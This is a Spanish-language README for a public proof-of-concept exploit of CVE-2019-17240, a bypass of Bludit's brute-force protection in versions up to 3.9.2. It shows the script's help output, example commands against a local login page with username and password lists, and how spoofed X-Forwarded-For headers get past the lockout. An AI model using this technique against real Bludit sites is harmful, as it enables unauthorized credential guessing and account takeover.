
Bludit <= 3.9.2 - Bypass de Mitigación de Ataque de Fuerza Bruta de Autenticación Exploit/PoC
Código de Exploit para CVE-2019-17240 alias Bludit <= 3.9.2 Bypass de mitigación de fuerza bruta
Enlaces del Exploit: [ExploitDB-48942] [PacketStorm]
Resultado esperado: Descubrir credenciales de inicio de sesión, evadiendo el mecanismo de fuerza bruta en un host que ejecute Bludit <=3.9.2
Destinado únicamente para fines educativos y pruebas en entornos corporativos.
Este Exploit fue probado en Python 3.8.6
cfx: ~/bludit
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL] [-u USERLIST] [-p PASSLIST]
Bludit <= 3.9.2 Auth Bruteforce Mitigation Bypass
optional arguments:
-h, --help show this help message and exit
-l URL, --url URL Path to Bludit (Example: http://127.0.0.1/admin/login.php)
-u USERLIST, --userlist USERLIST
Username Dictionary
-p PASSLIST, --passlist PASSLIST
Password Dictionary
Exploit Usage :
./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt
./exploit.py -l http://127.0.0.1/admin/login.php -u /Directory/user.txt -p /Directory/pass.txt
Instalación:
pip3 install pwn
pip3 install requests
Este exploit espera tres entradas del usuario :
Uso del exploit donde el nombre de usuario dentro de user.txt se compara con cada contraseña dentro de pass.txt y se envía al inicio de sesión:

Los valores se envían en el encabezado X-Forwarded-For desde pass.txt; si la lista contiene menos contraseñas, existe la posibilidad de que una palabra sea bloqueada por el servidor; en ese caso, el script mostrará la palabra bloqueada en la salida:

Al iniciar sesión correctamente, se mostrará la siguiente salida con las credenciales funcionales:

Este es un exploit para la vulnerabilidad encontrada por Rastating en Bludit CMS.
Explicación de la vulnerabilidad: https://rastating.github.io/bludit-brute-force-mitigation-bypass/.